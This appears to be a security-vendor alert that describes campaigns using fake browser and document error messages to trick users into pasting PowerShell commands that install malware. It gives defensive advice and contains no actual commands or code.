Beware of Fake Error Messages Deploying Malware 

18.06.24

Threat Intelligence Alerts

Recent cyber attacks have employed a clever social engineering technique to trick users into running malicious PowerShell scripts on their computers. Multiple threat actors, including the notorious TA571 spam group and a cluster named “ClearFake”, have been using fake browser and document errors to deploy various malware payloads. 

The attacks begin with users either visiting a compromised website or receiving a malicious HTML attachment pretending to be a Word document or file hosted on OneDrive. The malicious code on the webpage or within the HTML file displays a realistic-looking error message stating there is a problem with Google Chrome, Word, or OneDrive. 

The fake error messages instruct the user to run a “fix” by copying a PowerShell script into their clipboard and pasting it into either the PowerShell terminal, Windows Run dialog, or directly running it. When executed, the PowerShell script initiates a sequence of events leading to the download and installation of malware on the victim’s system. 

The PowerShell scripts have been observed deploying a range of malicious payloads, including: 

The payloads allow the attackers to gain remote control, steal data, mine cryptocurrencies, and perform other malicious activities on the compromised systems. 

While the attack requires user interaction to succeed, the social engineering tactics make it deceptively convincing. The fake error messages mimic legitimate warnings, providing both a perceived problem and solution in a single display. Users may be prompted to act quickly before considering the potential risks. 

Furthermore, the fact that the malicious code is run directly from the clipboard rather than an executable file may bypass some security protections that scan for and block malware files. 

To avoid falling victim to these types of attacks, exercise caution with any prompts to copy/paste and run commands, even if they appear to be from trusted sources like operating systems or productivity software. Double check the validity of such warnings through official support channels before following instructions. 

Maintain updated security software, browse the web cautiously, and think critically before enabling any suspicious scripts, downloads, or programs. User education is crucial to identify and report these social engineering attempts. 

If you suspect your system has been compromised, immediately disconnect from the network, run anti-malware scans, and contact cyber security professionals to remediate the infection. 

Stay vigilant against evolving cyber threats that employ clever tactics to bypass security measures. With proper awareness and precautions, you can protect yourself and your organisation from malware deployment schemes abusing trusted system utilities.